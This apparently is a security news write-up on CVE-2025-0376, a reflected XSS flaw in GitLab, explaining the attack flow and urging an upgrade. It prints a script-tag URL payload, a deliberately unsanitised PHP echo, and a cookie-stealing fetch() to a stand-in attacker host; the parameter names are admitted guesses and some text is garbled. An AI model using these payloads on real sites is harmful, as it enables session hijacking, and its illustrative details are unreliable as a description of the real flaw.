CVE CyberSecurity Database News

CVE-2025-0376 - Serious XSS Vulnerability in GitLab (13.3 to 17.8.1) and How It Can Be Exploited

Poster -

A critical Cross-Site Scripting (XSS) vulnerability was discovered in GitLab CE/EE (Community and Enterprise Edition). This flaw, tracked as CVE-2025-0376, lets an attacker run unauthorized JavaScript code just by getting a victim to view a malicious change page. All GitLab versions from 13.3 up to (but not including) 17.6.5, 17.7.4, and 17.8.2 are affected.

Steal session cookies (gain access to GitLab as the victim)

- Run silent malicious actions (change settings/credentials)

Redirect users to phishing sites

Let's break down how this works and how to protect yourself.

What’s the Problem?

GitLab is a widely-used platform for code collaboration and DevOps pipelines. Many teams around the world depend on it.

The vulnerability is a type of reflected XSS — a class of web security bugs that let attackers inject JavaScript into pages viewed by other users.

The specific issue lies in the way the GitLab web interface handles user-controlled input when rendering change pages. If crafted just right, a payload (malicious code) can be inserted and executed in someone else's browser.

Affected Versions

- GitLab CE/EE 13.3 up to (but not including)

17.8.2

Official GitLab Security Notice

A common attack flow could be

1. The attacker crafts a special URL containing JavaScript payload as an input parameter to a "change page".
2. Victim (user with higher privileges) is lured to click this link — maybe via phishing email or a malicious comment in a GitLab issue.
3. Malicious script executes in the victim’s browser. Now the attacker can steal the session, perform actions on behalf of the victim, or embed more evil scripts.

Imagine GitLab uses a parameter called change_id in its change pages, something like

https://gitlab.example.com/changes/view?change_id=123

If the page doesn’t properly sanitize input, attacker can inject JavaScript as follows

https://gitlab.example.com/changes/view?change_id=<script>alert('XSS')</script>;

When a victim clicks the link, the embedded script will run in their session context!

Here’s a simplified example

<!-- Imagine the vulnerable HTML snippet -->
<div>
  Change ID: <?php echo $_GET["change_id"]; ?>
</div>

If no sanitization is done,will be executed in the victim’s browser!

Proof of Concept (JS)

<script>
  // Steals the session cookie and sends to attacker's server
  fetch('https://evil.attacker.com/steal?cookie='; + document.cookie)
</script>

How to Fix

Upgrade!

17.8.2

or later versions.

GitLab release notes and upgrade guide

For Reference

- CVE-2025-0376 in MITRE *(pending listing)*
- GitLab Security Release 17.8.2
- OWASP XSS Cheat Sheet

Bottom Line

CVE-2025-0376 is easy to exploit, very dangerous, and widely present in older GitLab versions.
Make sure your GitLab is updated. Urge your team, customers, and friends to patch without delay.

Stay safe — don’t let someone else ride along in your dev environment!

Timeline

Published on: 02/12/2025 15:15:15 UTC